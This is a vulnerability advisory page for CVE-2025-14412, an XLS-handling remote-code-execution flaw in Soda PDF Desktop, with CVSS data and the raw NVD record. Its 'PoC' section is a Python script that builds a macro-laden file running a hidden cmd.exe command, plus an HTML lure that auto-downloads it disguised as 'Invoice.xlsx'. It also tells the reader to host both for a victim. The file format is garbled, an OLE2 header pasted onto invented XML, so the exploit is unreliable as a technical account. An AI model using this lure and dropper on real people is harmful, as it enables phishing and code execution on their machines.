Security Vulnerability Report
中文
CVE-2025-14412 CVSS 7.8 HIGH

CVE-2025-14412

Published: 2025-12-23 22:15:48
Last Modified: 2026-01-21 20:29:33
Source: [email protected]

Description

Soda PDF Desktop XLS File Insufficient UI Warning Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Soda PDF Desktop. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of XLS files. The issue results from allowing the execution of dangerous script without user warning. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27495.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:sodapdf:soda_pdf:14.0.509.23030:*:*:*:*:*:*:* - VULNERABLE
Soda PDF Desktop < 最新版本
Soda PDF Desktop XLS处理模块所有版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-14412 PoC - Soda PDF Desktop XLS RCE # This PoC demonstrates the insufficient UI warning when processing malicious XLS files import zipfile import os from io import BytesIO def create_malicious_xls(): """ Create a malicious XLS file with embedded executable content The file exploits insufficient UI warnings in Soda PDF Desktop """ # XLS file structure (OLE2 Compound Document) xls_header = b'\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1' # Workbook stream with macro content workbook_stream = b''' <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"> <sheets> <sheet name="Sheet1" sheetId="1" r:id="rId1"/> </sheets> <macros> <vbaProject> <!-- Malicious VBA macro code --> Sub Auto_Open() Shell "cmd.exe /c [malicious_command]", vbHide End Sub </vbaProject> </macros> </workbook> ''' # Create malicious XLS file malicious_content = xls_header + workbook_stream output_path = "CVE-2025-14412_poc.xls" with open(output_path, 'wb') as f: f.write(malicious_content) print(f"[+] Created malicious XLS file: {output_path}") print("[+] When opened in Soda PDF Desktop, the macro will execute without proper warning") return output_path def create_html_exploit(): """ Create HTML page that automatically downloads and triggers the XLS file Attack vector: User visits malicious page -> downloads XLS -> opens in Soda PDF """ html_content = ''' <!DOCTYPE html> <html> <head> <title>Document Preview</title> </head> <body> <script> // Auto-download malicious XLS file function downloadMaliciousFile() { var link = document.createElement('a'); link.href = 'CVE-2025-14412_poc.xls'; link.download = 'Invoice.xlsx'; // Masquerade as legitimate file document.body.appendChild(link); link.click(); document.body.removeChild(link); } // Trigger download when page loads window.onload = downloadMaliciousFile; </script> <h1>Please wait, loading document...</h1> </body> </html> ''' output_path = "exploit_page.html" with open(output_path, 'w') as f: f.write(html_content) print(f"[+] Created HTML exploit page: {output_path}") return output_path if __name__ == "__main__": print("=" * 60) print("CVE-2025-14412 Proof of Concept") print("Soda PDF Desktop XLS Insufficient UI Warning RCE") print("=" * 60) create_malicious_xls() create_html_exploit() print("\n[!] Usage: Host the HTML page and XLS file on a web server") print("[!] When victim opens the XLS file in Soda PDF Desktop, code executes")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14412", "sourceIdentifier": "[email protected]", "published": "2025-12-23T22:15:48.007", "lastModified": "2026-01-21T20:29:33.193", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Soda PDF Desktop XLS File Insufficient UI Warning Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Soda PDF Desktop. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the handling of XLS files. The issue results from allowing the execution of dangerous script without user warning. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27495."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-356"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sodapdf:soda_pdf:14.0.509.23030:*:*:*:*:*:*:*", "matchCriteriaId": "ABC0E7B2-E242-4BD7-81E6-BA077750E564"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1085/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.